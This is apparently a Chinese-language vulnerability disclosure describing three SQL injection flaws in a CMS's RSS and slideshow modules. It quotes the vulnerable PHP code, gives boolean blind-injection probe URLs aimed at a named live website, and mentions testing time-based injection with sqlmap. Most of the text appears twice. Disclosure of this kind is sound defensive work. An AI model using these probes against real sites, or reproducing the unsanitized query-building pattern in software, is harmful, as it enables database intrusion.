### 简要描述: 不是全部网站都安装了这几个模板,这个模板用户量一般 ### 详细说明: 漏洞文件是/apps/rss/controller/fullsite.php中 ``` public function get_sectiondata(){ $sectionid = $_GET['sectionid']; //多个以','隔开 $outtyle = $_GET['outtyle'];//输出类型 $section_list = $this->_rss->ls_section($sectionid); $data = array(); foreach($section_list as $section){ if ($section['data'] && ($section['data']{0} == '{' || $section['data']{0} == '[')) { $data[] = json_decode($section['data'], true); } else { $data[] = unserialize($section['data']); ``` 跟踪ls_section函数 在/apps/rss/model/fullsite.php中 ``` function ls_section($sectionid){ $sql = "SELECT * FROM `#table_section` "; if($sectionid) $sql .= " WHERE sectionid IN (".$sectionid.")"; $sql .= " ORDER BY sectionid DESC"; $data = $this->db->select($sql); return $data; } ``` ``` $sectionid = $_GET['sectionid']; (".$sectionid.")"; ``` 可以看到没有过滤也没有单引号,不知道是不是有过滤,因为我源码没有完整解密 我们要减法盲注测试下是不是存在注入 一号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=1&outtyle=1...
### 简要描述: 不是全部网站都安装了这几个模板,这个模板用户量一般 ### 详细说明: 漏洞文件是/apps/rss/controller/fullsite.php中 ``` public function get_sectiondata(){ $sectionid = $_GET['sectionid']; //多个以','隔开 $outtyle = $_GET['outtyle'];//输出类型 $section_list = $this->_rss->ls_section($sectionid); $data = array(); foreach($section_list as $section){ if ($section['data'] && ($section['data']{0} == '{' || $section['data']{0} == '[')) { $data[] = json_decode($section['data'], true); } else { $data[] = unserialize($section['data']); ``` 跟踪ls_section函数 在/apps/rss/model/fullsite.php中 ``` function ls_section($sectionid){ $sql = "SELECT * FROM `#table_section` "; if($sectionid) $sql .= " WHERE sectionid IN (".$sectionid.")"; $sql .= " ORDER BY sectionid DESC"; $data = $this->db->select($sql); return $data; } ``` ``` $sectionid = $_GET['sectionid']; (".$sectionid.")"; ``` 可以看到没有过滤也没有单引号,不知道是不是有过滤,因为我源码没有完整解密 我们要减法盲注测试下是不是存在注入 一号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=1&outtyle=1 ``` 二号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=2-1&outtyle=1 ``` 三号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=2&outtyle=1 ``` 一号的值是1和二号的2-1=1是等于,返回了同样的数据 而三号是2,所以返回不同,所以存在注入 [<img src="https://images.seebug.org/upload/201510/05145940966685542c7a799a727dfd5da27dad65.png" alt="XI8U{`~R9{N3WB76K)[6[_S.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/05145940966685542c7a799a727dfd5da27dad65.png) [<img src="https://images.seebug.org/upload/201510/051459491a1ddf4ad9d31463dd51972596e0ff82.png" alt="QQ截图20151005145909.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/051459491a1ddf4ad9d31463dd51972596e0ff82.png) [<img src="https://images.seebug.org/upload/201510/05145957bc90609c052caaf1ddc816c2c5312c4c.png" alt="QQ截图20151005145926.png" width="600" 
onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/05145957bc90609c052caaf1ddc816c2c5312c4c.png) 第二处在/apps/rss/controller/fullsite.php中 ``` public function get_category(){ $categoryid = $_GET['categoryid']; //多个以','隔开 $outtyle = $_GET['outtyle'];//输出类型 $category_list = $this->_rss->ls_category($categoryid); $this->template->assign('list',$category_list); ``` 跟踪ls_category函数 在/apps/rss/model/fullsite.php中 ``` //获取栏目数据信息的数据 function ls_category($categoryid){ $sql = "SELECT * FROM `#table_category` "; if($categoryid) $sql .= " WHERE catid IN (".$categoryid.")"; $sql .= " ORDER BY catid DESC"; $data = $this->db->select($sql); return $data; ``` 和第一处一样就不演示了 第三处是延时注入 在apps\editor\controller\slide.php中 ``` public function pic_html() { $idtmp = explode(',',$_GET['id']); foreach($idtmp as $k=>$v){ if(!empty($v)){ $id[] = $v; } } $db = factory::db(); //得到$id[0]组图信息 $data = $db->select("SELECT * FROM #table_picture_group WHERE contentid=$id[0] ORDER BY sort ASC"); $html .= '<p><div class="picgroup"><div class="moverpic"><ul class="mover">'; $_count = 0; foreach($data as $value) ``` ``` $idtmp = explode(',',$_GET['id']); $data = $db->select("SELECT * FROM #table_picture_group WHERE contentid=$id[0] ORDER BY sort ASC"); ``` 分割后带入查询了,我们用sqlmap测试一下 [<img src="https://images.seebug.org/upload/201510/0711085666b43e65f069ee44aef00796a947e2be.png" alt="QQ截图20151007110840.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/0711085666b43e65f069ee44aef00796a947e2be.png) ### 漏洞证明: 漏洞文件是/apps/rss/controller/fullsite.php中 ``` public function get_sectiondata(){ $sectionid = $_GET['sectionid']; //多个以','隔开 $outtyle = $_GET['outtyle'];//输出类型 $section_list = $this->_rss->ls_section($sectionid); $data = array(); foreach($section_list as $section){ if ($section['data'] && ($section['data']{0} == '{' || $section['data']{0} == '[')) { $data[] = json_decode($section['data'], true); } else { $data[] = unserialize($section['data']); 
``` 跟踪ls_section函数 在/apps/rss/model/fullsite.php中 ``` function ls_section($sectionid){ $sql = "SELECT * FROM `#table_section` "; if($sectionid) $sql .= " WHERE sectionid IN (".$sectionid.")"; $sql .= " ORDER BY sectionid DESC"; $data = $this->db->select($sql); return $data; } ``` ``` $sectionid = $_GET['sectionid']; (".$sectionid.")"; ``` 可以看到没有过滤也没有单引号,不知道是不是有过滤,因为我源码没有完整解密 我们要减法盲注测试下是不是存在注入 一号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=1&outtyle=1 ``` 二号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=2-1&outtyle=1 ``` 三号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=2&outtyle=1 ``` 一号的值是1和二号的2-1=1是等于,返回了同样的数据 而三号是2,所以返回不同,所以存在注入 [<img src="https://images.seebug.org/upload/201510/05145940966685542c7a799a727dfd5da27dad65.png" alt="XI8U{`~R9{N3WB76K)[6[_S.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/05145940966685542c7a799a727dfd5da27dad65.png) [<img src="https://images.seebug.org/upload/201510/051459491a1ddf4ad9d31463dd51972596e0ff82.png" alt="QQ截图20151005145909.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/051459491a1ddf4ad9d31463dd51972596e0ff82.png) [<img src="https://images.seebug.org/upload/201510/05145957bc90609c052caaf1ddc816c2c5312c4c.png" alt="QQ截图20151005145926.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/05145957bc90609c052caaf1ddc816c2c5312c4c.png) 第二处在/apps/rss/controller/fullsite.php中 ``` public function get_category(){ $categoryid = $_GET['categoryid']; //多个以','隔开 $outtyle = $_GET['outtyle'];//输出类型 $category_list = $this->_rss->ls_category($categoryid); $this->template->assign('list',$category_list); ``` 跟踪ls_category函数 在/apps/rss/model/fullsite.php中 ``` //获取栏目数据信息的数据 function ls_category($categoryid){ $sql = "SELECT * FROM `#table_category` "; if($categoryid) $sql .= " WHERE catid IN 
(".$categoryid.")"; $sql .= " ORDER BY catid DESC"; $data = $this->db->select($sql); return $data; ``` 成因与第一处相同(未经过滤的 ID 字符串直接拼接进 IN 子句),这里不再演示 第三处是延时注入 在apps\editor\controller\slide.php中 ``` public function pic_html() { $idtmp = explode(',',$_GET['id']); foreach($idtmp as $k=>$v){ if(!empty($v)){ $id[] = $v; } } $db = factory::db(); //得到$id[0]组图信息 $data = $db->select("SELECT * FROM #table_picture_group WHERE contentid=$id[0] ORDER BY sort ASC"); $html .= '<p><div class="picgroup"><div class="moverpic"><ul class="mover">'; $_count = 0; foreach($data as $value) ``` ``` $idtmp = explode(',',$_GET['id']); $data = $db->select("SELECT * FROM #table_picture_group WHERE contentid=$id[0] ORDER BY sort ASC"); ``` 按逗号分割后,$id[0] 未经任何校验就直接拼接进了查询语句,我们用sqlmap测试一下 [<img src="https://images.seebug.org/upload/201510/0711085666b43e65f069ee44aef00796a947e2be.png" alt="QQ截图20151007110840.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/0711085666b43e65f069ee44aef00796a947e2be.png)